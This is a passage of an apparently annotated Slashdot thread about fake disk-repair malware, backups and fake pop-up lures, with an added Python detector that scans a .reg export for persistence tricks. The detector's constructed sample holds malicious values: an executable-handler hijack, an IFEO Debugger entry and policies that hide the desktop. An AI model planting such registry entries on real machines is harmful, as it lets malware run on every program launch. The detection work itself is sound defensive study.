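On a real desktop you would point `audit_launcher` at every `*.desktop` under `~/Desktop` and `~/.local/share/applications`, the directories a browser download or a dropped archive can write to. The mode-bit check is the one RobbieThe1st asks for; the Exec= checks are what you need in addition, because, as WorBlux notes, the execute bit on the launcher says nothing about what the launcher goes on to run.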

    114. Re:The Game of Catchup by Anonymous Coward · · Score: 0

      I've removed this from two machines. In both instances, MSE caught it, but the user clicked this button to "allow it to run", just like they do every time that warning pops up. I've created user accounts for them, and that's how they run stuff from now on.

    115. Re:The Game of Catchup by hairyfeet · · Score: 1

      Except you can't avoid it by choosing hardware because what works ATM may not work 6 months from now! Am I supposed to offer free hardware upgrades to all my customers when Torvalds gets an itch and borks something major that may not be fixed for months?

      I have seen this happen with Realtek HD sound, with Via chipsets and sound, even the Atheros wireless that so many on the forums pushed as "it just works", which BTW would have added a good $50 to any mobile build. Well, guess what happened? That's right, the latest updates are causing problems for those chips!

      So I'm sorry, but as a retailer that has tried your product since Ubuntu 6.04, as well as PCLOS and Mepis, I'm afraid I have to agree with what one poster here said: "Linux is free if your time is worthless". Because if it was my own box on my own time, where I had nothing better to do than trawl forums with a list of my make/model/rev of hardware? Then yes, I could use Linux on my personal machine. But for my customers, who just want to "flip the switch and go" and have no desire or inclination to learn Linux forums or CLI fix applications? Then I'm sorry, but it's a mess.

      Tell you what YOU try to design the hardware. Try to design a bog standard desktop and laptop using basic designs and then YOU go look at the forums and see if not at least one of those parts have been borked by updates between 6.04 and Ubuntu 11. I bet you'll find they have been borked at LEAST once, if not multiple times. Which only makes sense as you are talking about 10s of 1000s of drivers, all of which HAVE to keep up with Linus's constant kernel futzing. There is simply no way in hell all of those drivers for all of that hardware will be done in time for every single 6 month update, there simply aren't enough man hours dedicated to the job.

      Again, that is all well and good if it is only YOUR machine that gets borked, but I literally have on average between 4 and 7 boxes sold a week. Do the math and see how much of my time would be dealing with pissed off customers who got "update foo broke my drivers" and how much of my time would be wasted trawling forums for fixes. My time costs a minimum of $35 an hour; at that rate it only takes a little over 2 hours for Windows to become the cheaper solution. I can easily blow 4 or 5 hours minimum on a PITA driver breakage. The ONLY machines I have found where one can expect even a 2 year run without breaking is enterprise class hardware where the OEM supports Linux, like HP workstations. The MUCH higher price of those simply makes them not worth even looking at. Again, if Linux would fix this major deficiency, instead of slinging insults and kissing Torvalds' butt, Linux might get somewhere in the retail space. Because there are plenty of guys like me that would stock it.

      But you'll notice the ONLY places selling Linux boxes are online, where they don't have to support it after the sale. That is VERY telling, because I guarantee you that, like me, if they actually had to support the things after the sale they would find Linux a money pit. When you can't even get a single national retailer to stock your product in their B&M stores? And everyone from Staples to Walmart has tried and failed due to return rates being insane? Then it is high time to ask "What are we doing wrong?" and I'd say the constant driver breakage, which c'mon! It's 2011 not 1991 folks, is a hell of a reason to avoid your OS in the retail sector!

      --
      ACs don't waste your time replying, your posts are never seen by me.
    116. Re:The Game of Catchup by gad_zuki! · · Score: 1

      Microsoft does offer these vendors Windows Update. Heck, a few years ago Adobe was using it for a critical exploit. If you run WSUS or System Center you can see that MS goes out of its way for third-party updates.

      Turns out Adobe and Sun have a 'not invented here' problem with using MS.

    117. Re:The Game of Catchup by gad_zuki! · · Score: 1

      Buzz! learn how to read. I said like Chrome, which means that the update is done in the background with zero user intervention. I thought this was obvious but I guess the low reading comprehension contrarian nitpick brigade is in full force today.

    118. Re:The Game of Catchup by whoever57 · · Score: 1

      Microsoft does offer these vendors Windows Update.

      Link or you are spewing BS. Meanwhile here's my counter link.

      What MS does do is to include some 3rd party drivers in its own catalog, which is entirely different to my suggestion. Just to clarify, I am not suggesting that MS host the 3rd-party updates; instead, it should provide an API and processes to search for updates from 3rd-party sites, then download and install those updates.

      --
      The real "Libtards" are the Libertarians!
    119. Re:The Game of Catchup by SiChemist · · Score: 1

      Really? An AC that is obviously trolling is "the face of Linux". What kind of moron would accept that premise?

    120. Re:The Game of Catchup by Anonymous Coward · · Score: 0

      > Oh, and by the way, Microsoft, your fucking browser still sucks and is still atrociously insecure. Shape up, Redmond.

      Really? Care to point to some statistics showing me big holes in IE9 that are actively used by malware?

      Not much out there. Oh, there's no shortage of Java, Flash, and Adobe Reader holes, and according to stats lifted from crimepacks those are the ones used.

      I just looked at the stats on my website. 90% of those users have Java installed. How many of those are the latest version? Maybe 50%. Most of the Flash installs are not the latest version. Who knows what version of Reader they have.

      Plugin security is a nightmare right now. Blame Sun and Adobe for not having autoupdaters like Chrome does for Flash. Joe User has no idea what he's doing with a computer. Blaming MS isn't really helping him.

      Most users are not using IE9. There are hints from Microsoft that they should, OH WAIT, most people that aren't savvy are in Windows XP land still. Want them to use IE9? Can't. IE 6 and 7, what they are used to, and have been for a long time, is getting them into trouble.

    121. Re:The Game of Catchup by cbiltcliffe · · Score: 1

      You're not getting what I mean. I'm not meaning web/javascript popups that come up when you're browsing pr0n. I'm talking about the popup balloon indicators from the system tray, that come from programs already running on your computer.

      They're afraid that something already running on their computer will install malicious software, without realizing that if this is the case, they're already infected.

      --
      "City hall" in German is "Rathaus" Kinda explains a few things......
    122. Re:The Game of Catchup by metacell · · Score: 1

      I'm not a Linux guru either, but I think there's an option to install all security updates automatically, without user interaction, when you install Ubuntu.

    123. Re:The Game of Catchup by Anonymous Coward · · Score: 0

      Adobe does have an auto-updater. The sad thing is that it checks when you boot your computer. Most people I know (myself included) merely put their computer to sleep when not using it. I reboot my Windows desktop at most once a month if a patch requires it, and less often if a patch doesn't require a reboot. So checking for updates once a month at best isn't going to cut it.

    124. Re:The Game of Catchup by gad_zuki! · · Score: 1

      I manage a WSUS environment and push out Adobe Flash and Reader updates every month via WSUS and System Center. You can yell "bullshit" all you want but that makes you an ignorant person and sadly, people like you just never learn because it's easier to keep obsessing over your biases than admitting you're wrong and learning something new.

    125. Re:The Game of Catchup by whoever57 · · Score: 1

      I manage a WSUS environment and push out Adobe Flash and Reader updates every month via WSUS and System Center. You can yell "bullshit"

      I'll continue to yell "bullshit" while you fail to provide a link and because your use of WSUS to push out 3rd party updates doesn't answer my point of MS providing an API for 3rd party tools to hook into the Windows/Microsoft update tools.

      Stop being an apologist for MS and realize that not everyone runs a WSUS server or has the time to download and push out updates like this. People want to have a single method to automatically download updates without having to set up their own server just to get the updates.

      --
      The real "Libtards" are the Libertarians!
  3. Sounds Like System/Windows Recovery by Anonymous Coward · · Score: 0

    This is not new, nor even a new tactic. I have come across malware that held users' data to ransom by encrypting it. System/Windows Recovery is (rather unfortunately) extremely easy to pick up when a gullible user mistakes an error notification on a web site for a local machine generated message and interacts with it accordingly. These malware applications also disable anti-virus software and associated services for many popular AV/security products, which in my opinion is a damning indictment of those products.

    Fortunately, as easy as it is to pick up, it's also relatively easy to remove; there are many free tools available that do just that. However, you may wish to reconsider re-installing your O/S after you virus and malware scan your data and then perform a backup (post removal). I generally wouldn't trust an installation that has been compromised by malware such as this.

    1. Re:Sounds Like System/Windows Recovery by MightyMartian · · Score: 1

      Well, in my case, the most it could do is fuck with the files that the user had permissions to fuck with. The system itself, other than the profile, was fine. I was thinking about putting in some software execution policies, only to find out that they're pretty well useless.

      --
      The world's burning. Moped Jesus spotted on I50. Details at 11.
    2. Re:Sounds Like System/Windows Recovery by adolf · · Score: 4, Informative

      I just cleaned this off of a computer two days ago.

      It set some registry values meant for maximum fuckery, marked every file on the disk that it could access as being hidden (thus even "dir" from a command line would result in "File not found"), nuked the contents of the start menu, and did some other mean stuff.

      Malwarebytes removed it but left the registry broken (which is arguably correct behavior). I changed the registry entries by hand, and I restored the start menu from an earlier copy.

      After that, things were happy...except for a lingering, and possibly unrelated, issue with links from Google being redirected to spam. This turned out to be an infected Windows DLL, which "sfc /scannow" couldn't/didn't bother to fix. I was just about to give up on the machine for a happy time of nuke/reinstall, and another half-dozen hours of putting the machine back how it was... but then I tried combofix and the redirect problem went away, too.

      All said: While I am a little richer having fixed these problems, money is poor compensation for this sort of pain.

      I welcome the day when an affordable online service* can do incremental backups that can be used for a simple, bare-metal restore. Bandwidth isn't the issue anymore, and spinning storage is cheap; where is it?

      *: Yes, online. If it's offline, that means that folks will have to think about it on a regular basis, and it won't be done.
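
The registry side of this infection comes up twice in the thread: Lime Green Bowler (comment 91 above) saw the launch of every executable rewired to call the malware with the original exe as a parameter, and adolf here fixed the values meant for "maximum fuckery" by hand. An added example in Python, not code from either poster or any tool, that scans a `.reg` export for those shapes: an `exefile\shell\open\command` handler that is anything other than the stock `"%1" %*`, an Image File Execution Options `Debugger` value, and the Explorer/ActiveDesktop policy values that hide desktop icons and lock the wallpaper. The export it parses is constructed for the demonstration (the `hdd.exe` path, `scanner.exe` and the `bob` profile are invented); nothing here touches a live registry.

```python
"""Scan a .reg export for the registry hijacks described in the thread: an
exefile handler that routes every program launch through the malware, IFEO
Debugger entries, and Explorer policies that hide the desktop or lock the
wallpaper. Added example, not code from any poster; the export it parses is
constructed."""

EXPECTED_EXE_HANDLER = '"%1" %*'   # what exefile\shell\open\command normally holds

# (key suffix, value name) -> meaning, when the value is dword 1
HIDING_VALUES = {
    ("policies\\explorer", "nodesktop"): "desktop icons hidden by policy",
    ("explorer\\advanced", "hideicons"): "desktop icons hidden",
    ("policies\\activedesktop", "nochangingwallpaper"): "wallpaper change disabled by policy",
}


def _unescape(s):
    """Undo .reg escaping of backslashes and double quotes."""
    out, i = [], 0
    while i < len(s):
        if s[i] == "\\" and i + 1 < len(s):
            out.append(s[i + 1])
            i += 2
        else:
            out.append(s[i])
            i += 1
    return "".join(out)


def parse_reg(text):
    """Parse a .reg export into {key: {value_name: value}}; '@' is the default value."""
    reg, key = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";") or line.startswith("Windows Registry Editor"):
            continue
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1]
            reg.setdefault(key, {})
            continue
        if key is None or "=" not in line:
            continue
        name_part, data = line.split("=", 1)
        name = "@" if name_part == "@" else _unescape(name_part.strip('"'))
        if data.startswith('"') and data.endswith('"'):
            value = _unescape(data[1:-1])
        elif data.lower().startswith("dword:"):
            value = int(data[6:], 16)
        else:
            value = data          # hex:, hex(2): and friends are left raw
        reg[key][name] = value
    return reg


def find_indicators(reg):
    """Return (what, key, value) triples for entries matching the hijack patterns."""
    findings = []
    for key, values in reg.items():
        k = key.lower()
        lowered = {n.lower(): v for n, v in values.items()}
        if k.endswith("\\exefile\\shell\\open\\command"):
            handler = str(values.get("@", ""))
            if handler.strip() != EXPECTED_EXE_HANDLER:
                findings.append(("exe handler hijacked", key, handler))
        if "\\image file execution options\\" in k and "debugger" in lowered:
            findings.append(("IFEO debugger set", key, lowered["debugger"]))
        for (suffix, name), what in HIDING_VALUES.items():
            if k.endswith(suffix) and lowered.get(name) == 1:
                findings.append((what, key, 1))
    return findings


# constructed sample export; the paths and program names are invented
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

; constructed sample, not an export from a real infection
[HKEY_CURRENT_USER\Software\Classes\exefile\shell\open\command]
@="\"C:\\Users\\bob\\AppData\\Local\\Temp\\hdd.exe\" /s \"%1\" %*"

[HKEY_CLASSES_ROOT\exefile\shell\open\command]
@="\"%1\" %*"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\scanner.exe]
"Debugger"="svchost.exe"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoDesktop"=dword:00000001

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop]
"NoChangingWallPaper"=dword:00000001
'''


def demo():
    """Run the indicator scan over the constructed export."""
    return find_indicators(parse_reg(SAMPLE_REG))


if __name__ == "__main__":
    for what, key, value in demo():
        print(f"{what}: [{key}] {value}")
```

Two points the sample is built around. The hijacked handler lives under `HKEY_CURRENT_USER\Software\Classes`, which a user-level process can write and which takes precedence over the machine-wide `HKEY_CLASSES_ROOT` entry when Windows merges the two, so the stock handler there is not evidence that launches are clean. And the handler must be restored before any cleanup tool is run from the infected profile, since with it in place every `.exe` launch goes through the malware first, which is the re-infection path Lime Green Bowler describes. The `attrib` hiding adolf mentions is separate from the registry and comes off with `attrib -h -s /s /d` over the affected tree.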

    3. Re:Sounds Like System/Windows Recovery by amliebsch · · Score: 2

      If this is Win7, it doesn't have to be online. Just attach an external USB disk and tell it to back up there. It will automatically do an image+incrementals, auto-delete the oldest images when the disk is getting full, and can be bare-metal restored booting from the Windows DVD. It's actually pretty sweet.

      Also: if the registry is hosed, system restore should be able to help you out.

      --
      If you don't know where you are going, you will wind up somewhere else.
    4. Re:Sounds Like System/Windows Recovery by Anonymous Coward · · Score: 0

      Dis is one half.

    5. Re:Sounds Like System/Windows Recovery by adolf · · Score: 2

      If the malware takes control of the PC (which it does, in the context of the FA), then having a single, locally-attached backup disk isn't necessarily a good answer: It can destroy/disrupt the backup just as easily as it can anything else on that PC.

      A well-thought-out rotation of backup media would help, but that's no good because it involves humans who simply won't do it.

      This wouldn't be a problem, so much, with good online storage: Even Dropbox does a good job of keeping old copies of your data intact for a period of time. I simply want the concept extended to an entire disk, with metadata intact, to enable a bare metal recovery.

      This, combined with extra, out-of-band human verification (SMS?) for when you Really, Really want to destroy backup data, would work well against malware.

      (And, yeah: I did use System Restore eventually. I consider it to be a last resort, though, simply because I am ignorant as to the extent of its workings and I am prejudiced against system-level programs which do not provide meaningful feedback as to what they're doing.)

    6. Re:Sounds Like System/Windows Recovery by MokuMokuRyoushi · · Score: 1

      except for a lingering, and possibly unrelated, issue with links from Google being redirected to spam

      Hey - I just had the same problem with an office computer. I got rid of it the same way, but for some unidentifiable reason, about half the links in FF now are opening in IE. Did you have the same issue? If so, have you figured out the problem?

      --
      Humans are terrible replicators of Godly things.
  4. False alert by lucm · · Score: 3, Funny

    A little while ago I was sure I had this malware on my computer. However the actual problem was worse: I had a Seagate hard drive.

    There is an upside with Seagate products: they taught me the importance of using RAID and/or backups.

    --
    lucm, indeed.
    1. Re:False alert by LurkerXXX · · Score: 4, Insightful

      AND BACKUPS! *AND BACKUPS*!!!

      RAID is *NOT* a substitution for backups. Delete a file on the RAID and it's gone. Someone takes the machine, and it's gone.

      Backup your computer to offline media, and make sure to keep a (hopefully encrypted) copy of it at some remote location (like a family member's house, work, wherever).

      RAID IS NOT A SUBSTITUTION FOR BACKUPS!

    2. Re:False alert by adolf · · Score: 1

      Seconded, and furthered:

      RAID would do nothing to protect against the thing described in TFA.

      RAID only protects against hardware failure, and even then only if the failure is actually detected instead of just silently munging data.

      This is not to say that RAID is not useful: It can be a performance boost in some applications. It can provide a clever way to combine many smaller disks into one larger volume, which can also be useful in some instances. To be sure, some of the things RAID does do can be very cool for a lot of different reasons.

      But RAID is not a backup. It never was, and it never will be.

    3. Re:False alert by lucm · · Score: 0

      > Delete a file on the RAID and it's gone

      Do you check that all your files are there before taking a backup? Probably not. Even if you have a very complex strategy of nested backup with grandfather and his whole family, odds are that once you notice that the said file is gone, it is also gone on your backup.

      You see, just typing stuff in uppercase does not mean you are right. There is a whole discipline around this kind of stuff, it's called Information Lifecycle Management. But in any case this is completely off-topic, as my comment was merely an opportunity to complain about my bad experience with Seagate hard disks.

      > RAID IS NOT A SUBSTITUTION FOR BACKUPS!

      UPPERCASE IS NOT A SUBSTITUTION FOR HAVING SOMETHING INTERESTING TO SAY.

      --
      lucm, indeed.
    4. Re:False alert by Anonymous Coward · · Score: 0

      I always tell people RAIDs give you very nice copies of nothing if you format drives or delete files. Always keep off-array and preferably off-site backups.

    5. Re:False alert by Anonymous Coward · · Score: 0

      Someone takes your backup, and it's gone.

      What was your point again?

    6. Re:False alert by WuphonsReach · · Score: 1

      > Do you check that all your files are there before taking a backup? Probably not. Even if you have a very complex strategy of nested backup with grandfather and his whole family, odds are that once you notice that the said file is gone, it is also gone on your backup.

      rdiff-backup

      The backup directory has a pristine copy of the current data, with the outdated content stored as incrementals going back as far as you want. (We do 13 months.)

      Any sort of delta/snapshot style backup strategy handles this just fine. As long as you have enough space on the backup media to store all of the deltas for the time duration that you want.

      --
      Wolde you bothe eate your cake, and have your cake?
    7. Re:False alert by Anonymous Coward · · Score: 0

      Notice the comment about keeping a backup offsite.

      Anonymous moron.

    8. Re:False alert by lucm · · Score: 1

      > The backup directory has a pristine copy of the current data, with the outdated content stored as incrementals going back as far as you want. (We do 13 months.)

      Which is awesome. Having 13 months of deltas that are absolute garbage if you lose the backup directory means that every time you run your backup you play Russian roulette with your deltas (and with 12.96 months of backup history). You might feel like you have a bullet-proof system but actually my aunt who runs NTBackup every once in a while is better protected than you (she also does a terrific apple pie).

      Keeping old deltas is not a backup strategy. Keeping old deltas is a convenience that one can offer to users so they can access data as it was a long time ago. For disaster recovery purposes, one needs reliable, fully independent backups.

      Once in a while we see in the news some big company who lost a lot of data and was unable to restore it from their backup. A long chain of deltas is often involved.

      > Any sort of delta/snapshot style backup strategy handles this just fine. As long as you have enough space on the backup media to store all of the deltas for the time duration that you want

      I totally disagree with your backup strategy, however you are correct that an unlimited amount of deltas and an unlimited amount of space will definitely handle the loss of a file - as long as your main backup is working and as long as the creation and loss of the file does not occur between your backup windows.

      --
      lucm, indeed.
    9. Re:False alert by h4rr4r · · Score: 1

      The deltas are stored with the fulls. All on the same device. Many of those devices exist. I can pull any one of 30 tapes right now and get that day's full and the files that changed going back 30 days. Before you ask, those are just the dailies; there are also monthlies, quarterlies and yearlies, and those each go on 4 tapes so I can lose 3 of them.

      Even if on every one of those tapes the base full was gone, I would have every file that changed. The whole file is recorded if it changed, meaning since these backups go back for years I could still get damn near all the data. To be that bad off though something would have to damage 100+ tapes. Most of those being inside an underground vault, which sounds cool but is really just an old bank.

      Using rsnapshot, each device having full + delta (the whole file that changed, not just the part that changed) is the standard practice. You make some rather poor assumptions, clearly from lack of information.

      If your aunt is running NTBackup to the same device over and over she is going to be very sad when it fails. Also make sure that device is off site.

    10. Re:False alert by hb79 · · Score: 0

      > However the actual problem was worse: I am still using Windows.
      FTFY.

      Although, the real problem is that you're posting on Slashdot about it. We're not interested, ok? I'm sure there's a .net forum somewhere you can rant on.

    11. Re:False alert by Anonymous Coward · · Score: 0

      Offsite compromised, and it's gone.

      What's the point again?

    12. Re:False alert by Anonymous Coward · · Score: 0

      It appears the main point is to maintain multiple copies, preferably duplicated offsite, to minimize the loss of data during catastrophic events. But the smug appears strong in the original poster so it's difficult to say for sure. Nothing is ever guaranteed, and people who jump on the "RAID is not backup" bandwagon can't see the forest through the trees.

    13. Re:False alert by lucm · · Score: 1

      > Although, the real problem is that you're posting on Slashdot about it. We're not interested, ok?

      It's easy to spot insecure people; they tend to talk in the name of a group because they feel their opinion as an individual is not worth a lot.

      I am curious as to who this "we" you talk about is. Are you a spokesperson for the Slashdot community as a whole, or just a very specific subset, some kind of elite group maybe? Do you have a newsletter I could subscribe to, or maybe a webring or a Facebook page? Do you have a secret handshake that I could use to talk my way out of a ticket or to cut in line at the theater?

      > I'm sure there's a .net forum somewhere you can rant on.

      Out of curiosity I took a quick look at your recent posts and there is a pattern... Usually you tell people to go post their stuff on Digg, but in my case you made an exception and suggested for some reason to find a .net forum. Which is peculiar, since my post was about hard drives.

      Either you are a true Slashdot Vigilante, or you are a shareholder of Digg and various .net forums and you try to bring in more traffic. Tsk tsk.

      In any case, I friended you (as neutral, but still). I am looking forward to seeing more of your posts in the future, and for everybody's convenience maybe you could include a hyperlink to Digg so I would not need a bookmark; I would just need to have a look at your redundant posts.

      --
      lucm, indeed.
    14. Re:False alert by cthulhu11 · · Score: 1

      > RAID only protects against hardware failure

      If it's a type that provides redundancy, sure.

      > and even then only if the failure is actually detected instead of just silently munging data

      Repeat after me: Z F S. I had a disk do this on me last week.

      > However the actual problem was worse: I had a Seagate hard drive.

      Seagate drives have been okay for us. We've had a bunch of failures, but those have been out of a whole bunch of disks. The *incidence* for us with Seagate drives hasn't been any better or worse than with Hitachi/IBM or Fuji or Toshiba drives. Now, the Quantum Q105S, now there was a shitty-ass disk.

    15. Re:False alert by hb79 · · Score: 0

      Geez, you can know a nerd from his over-analyzing narrow vision, and conclusions based on air.

      All I ask for is less Microsoft while reading Slashdot. If please is what it takes, I can even afford that:
      Please, post your Windows questions somewhere else, on your favorite forum, I really don't care where.

    16. Re:False alert by lucm · · Score: 1

      > Geez, you can know a nerd from his over analyzing narrow vision, and conclusions based on air.

      Says the guy who complains about Windows questions to someone who posted a joke about Seagate hard drives.

      > Please, post your Windows questions somewhere else, on your favorite forum, I really don't care where

      There was never a Windows question. I suggest you read my post again really slowly (maybe with the help of someone), then read your reply, and if it does not dawn on you that it is you that brought Windows, Microsoft and .net into this thread then you should have a serious talk with those voices inside your head because they are misleading you (and if one of them is telling you to hurt people then maybe you should start to worry).

      > All I ask for, is less Microsoft while reading Slashdot.

      Again, you are the one who brought Microsoft in this thread. This being said, you have no control over what is posted by other people and while you can make all the demands you want, unless you have some kind of leverage like a hijacked plane full of kids and puppies, I suspect you will never obtain satisfaction.

      The pursuit of happiness is part of the American dream so you are welcome to keep complaining all the time, but I would say your odds of success will be significantly higher if you don't bring up yourself the subjects you dislike.

      --
      lucm, indeed.
  5. First fucking flag for anyone with a clue by Datamonstar · · Score: 0

    Download a fix for a hardware problem. Maybe firmware, but no way that'll be coming through anything other than the manufacturer's channels of communications. Also, it's the OS that makes this possible. Note that nothing at all is actually happening to the files. Shame shame shame again.

    --
    The eternal struggle of good vs. evil begins within one's self.
    1. Re:First fucking flag for anyone with a clue by Anonymous Coward · · Score: 0

      How fucking stupid do you have to be to think that this is targeting people who have a clue? Did you think about this at all, or did you just have some desperate desire to come across as an unlikeable Comic Book Guy figure?

    2. Re:First fucking flag for anyone with a clue by Aeternitas827 · · Score: 1

      I think the point that's being made is that people need to be a little more educated on shit like this (or, alternately, that people aren't paying attention to or are too dumb to comprehend the reliable information out there).

      I think most of us understand that this is meant to prey on those who are a little less wise with their systems. Any good scam targets the idiots, because a successful scam generally depends on the target not seeing that 1 and 1 aren't making 2 any longer.

      --
      I don't post AC. I like my -1, Flamebaits. Trump/Sheen 2012 on the Batshit Insane ticket!
  6. When web apps... by 3vi1 · · Score: 2

    When web apps pop up realistic-looking XP or Win7 windows claiming virus infection... or the need to run an 'exe' to install a missing codec, it's a good day to be running Linux or OS X. Nothing tells you fraud so much as something that's been polished to a fine point to fool the Windows users.

    1. Re:When web apps... by rtaylor · · Score: 1

      True, but there is nothing here that couldn't be done just as easily on OSX and Linux.

      Remove users' files in standard Gnome/KDE places and futz with the .bashrc or .profile file to make the login wonky.

      --
      Rod Taylor
    2. Re:When web apps... by miknix · · Score: 1

      Next step.. Modify the malware to prompt the user to install Linux?

    3. Re:When web apps... by somersault · · Score: 1

      Good reason to change the default theme in Windows too.

      --
      which is totally what she said
    4. Re:When web apps... by adolf · · Score: 1

      While I believe your advice is well-intentioned, it's really no good.

      This only works if the malware isn't using existing Windows widgets for its displays.

      If I were a Windows programmer (I'm not) and I were writing malware (good heavens!), I'd use the native toolkit for all of my dealings...just like most other software does. It's easier, that way.

      And then: Changing themes, for properly-implemented malware, would also change the look of that ill program to match.

    5. Re:When web apps... by 3vi1 · · Score: 1

      >> True, but there is nothing here that couldn't be done just as easily on OSX and Linux.

      And tell us how you would do that? How would you make a web page that convinces the user that they should click 'okay' on your installer instead of going to the system app center / repositories?

      People that were conditioned to Windows might fall for it, but people that 'learned' Linux would know it's BS.

      How would you convince someone to give you the admin ID when they didn't launch an installer or app that needs admin access?

      VIRUSES IN LINUX DON'T PROPAGATE BECAUSE LINUX DOESN'T WORK LIKE WHAT YOU'RE USED TO.

    6. Re:When web apps... by pz · · Score: 2

      > When web apps pop up a realistic looking XP or Win7 windows claiming virus infection... or the need to run an 'exe' to install a missing codec, it's a good day to be running Linux or OS X. Nothing tells you fraud so much as something that's been polished to a fine point to fool the Windows users.

      Good reason to not have the default color scheme on your windows box. Makes it easy to spot the fake popups.

      --
      Put my fist through my alarm clock with its ding-dong death inside my ear. - The Blackjacks.
    7. Re:When web apps... by amliebsch · · Score: 1

      Most malware, being trojans, cannot create native widgets because they are stuck inside of the browser jail, so they simulate system widgets to fool users into believing they are not already jailed to the browser, and then the user inadvertently lets it out of the jail.

      --
      If you don't know where you are going, you will wind up somewhere else.
    8. Re:When web apps... by Anonymous Coward · · Score: 0

      You're not the person the malware is trying to fool.

      If you know enough about computers to recognize malware, you probably know enough to remove it.

      Gramma? Not so much in either case.

    9. Re:When web apps... by Anonymous Coward · · Score: 0

      "Viruses" don't propagate in Linux because nobody fucking uses Linux.

      Derp it up all you wish, the fact is, Linux has no desktop marketshare that's even worth mentioning. Oh, but you'll be in for a surprise if that ever changes. Protip - Ubuntu's lolroot crap is as effective as anything else at teaching users they should click 'OK' whenever presented with strange dialog.

      Now if you'll excuse me, I have to go laugh at all the tools who install $CMSFLAVOROFTHEMONTH into a docroot and then never fucking update it. Linux. Hurr, durr, answer to everything, hurr.

    10. Re:When web apps... by Pentium100 · · Score: 1

      > How would you make a web page that convinces the user that they should click 'okay' on your installer instead of going to the system app center / repositories?

      There are a lot of people who are used to Windows, so if they switch, especially after hearing that Linux has no viruses/malware they might feel safe clicking on anything.
      Also, in my experience not all programs and drivers are in the default repositories. For example, drivers for Canon multifunction devices (the scanner part) are available as a .deb file from the Canon website, but not from any Debian Linux repository. Which means that I (or someone else) actually have to sometimes download and run a file to install a program. The Opera web browser is also not available in the default Debian repositories, but has its own repository and I have to add it to the list to be able to use Opera. So, I (or someone else) have to do that sometimes too. Sometimes I also may download and run a shell script to do something that I want. I can read and semi-understand a simpler shell script, though; I doubt that everyone can.

      Any of these could be a way for malware. If a user wants the screensaver with kittens, he will try to install it. Also, "Your computer has problems, download this simple script to fix them". The script then downloads and runs whatever the malware makers want.

      > How would you convince someone to give you the admin ID when they didn't launch an installer or app that needs admin access?

      "Want this screensaver with the cute kittens? You can download it for free (admin access required to install)"

      If you impose behavior limits, like "don't click on ads, don't install random programs, do not run as root, stay updated" then Windows becomes quite safe too. Sure, there are remote vulnerabilities, but I really doubt that, say, Firefox or Flash on Linux is completely safe (if so, why do the Windows versions have bugs?). Running as a limited user will limit the malware to just screwing up the user's files which, on a single-user system, is almost as bad as screwing up the whole system (if malware deleted all my files, I might as well format and reinstall).

      Limiting the user to default repositories would only work if the repositories contained every single non-malware app that is available, otherwise there will be a reason for the user to use alternative means of getting the software and may end up getting malware.

    11. Re:When web apps... by vlueboy · · Score: 1

      Thanks for the Java reminder --I got this new PC the other day and had meant to ensure the OEM had NOT bundled it. I had a recent Java-initiated spyware infection on the Vista laptop earlier in the week.

      I'd forgotten to dump the Java runtime since I used to play with the SDK. Because enterprise Java has grown ever complex and acronym-ridden, I simply stopped minding it about 2 years ago and forgot to remove its inconvenient attack vector even though I've been hit through it more than once.

      On the color schemes, I used to have Teal (aquamarine colors) immediately highlight the one white and gray "standard-colored" window popups as fake. Fake popups also stand out when all you have is MacOS 8 --the problem goes back to more than a decade ago. It's a shame that after Windows 2000, MS has hidden and then removed the fancy pre-named color themes (not Luna or glass, but the CLASSIC ones) and left only the default AND green-on-black ones.

      I'm pretty sure they want to establish a non-fragmented look to compete against the pretty iconic MacOS X brushed metal and Gnome's brown desktop motifs.

    12. Re:When web apps... by adolf · · Score: 1

      If that's "most" of them, as you say, then I've never had to cure "most" infections because they never happened to begin with.

      TFA is about a program, running on the local computer, which proclaims quite persuasively to be part of Windows. Changing themes will do fuck-all to help folks see the difference.

    13. Re:When web apps... by Archangel+Michael · · Score: 1

      Why is this even allowed (widget impersonation) is beyond me. The reason being, clicking the big X in the upper right should do one thing only, close a window, not install Super Deluxe Antivirus 2011, Doomsday Edition.

      And wasn't anti-popup technology supposed to fix this?

      --
      Agent K: A *person* is smart. People are dumb, stupid, panicky animals, and you know it.
    14. Re:When web apps... by SheeEttin · · Score: 1

      Or, seeing the XP-styled attempts on Windows 7... that's nice too.

    15. Re:When web apps... by amliebsch · · Score: 1

      Lol look at this knockers on this girl!

      If you can't see the vid, just update your linux codecs by clicking here: http://icanhazmalware.deb/

      --
      If you don't know where you are going, you will wind up somewhere else.
    16. Re:When web apps... by amliebsch · · Score: 2

      Most infections START that way. Pop up a browser window with fake widgets and a virus scanner, animate the scrollbar and scare the user with a fake virus alert. The user doesn't realize this is just a browser window and everything in it is faked. Then the scared user clicks the "Clean now" button, voluntarily runs the software, and it's game over. NOW the software can do whatever it wants.

      --
      If you don't know where you are going, you will wind up somewhere else.
    17. Re:When web apps... by Billly+Gates · · Score: 1

      "Remove users files in standard Gnome/KDE places and futz with the .bashrc or .profile file to make the login wonky."

      Yeah, I already tried Gnome-shell thanks

    18. Re:When web apps... by ShoulderOfOrion · · Score: 1

      I have to agree, and Linux has been my desktop OS since the mid '90s.

      I've had my mom (in her 70's) running Linux for over a decade. Ubuntu for the last 5 years. It's cut down my IT support calls by 90%. But she's not a Linux user, she's a Firefox/Thunderbird user. And she knows how to respond to the upgrade alert, typing in that admin password every time. I dread the day Linux becomes popular enough to start targeting.

      Go Windows!

    19. Re:When web apps... by WuphonsReach · · Score: 1

      > Why is this even allowed (widget impersonation) is beyond me. The reason being, clicking the big X in the upper right should do one thing only, close a window, not install Super Deluxe Antivirus 2011, Doomsday Edition.

      > And wasn't anti-popup technology supposed to fix this?

      a) Web browsers serve text and images. They do not (yet) monitor what the content of those images look like. It's very easy to create a web page that looks a lot like an operating system warning, you just have to keep it within the borders of the page.

      (Which is why some systems dim the entire screen before presenting security dialog prompts. That's something that a fake alert in a web browser can't do.)

      b) Anti-popup technology does not yet handle DHTML(?) pop-ups or pop-ups done with CSS tricks. On the plus side, those tricks are constrained to the browser tab where they occur instead of actually popping open additional browser windows of random sizes in front of or behind the existing browser window.

      --
      Wolde you bothe eate your cake, and have your cake?
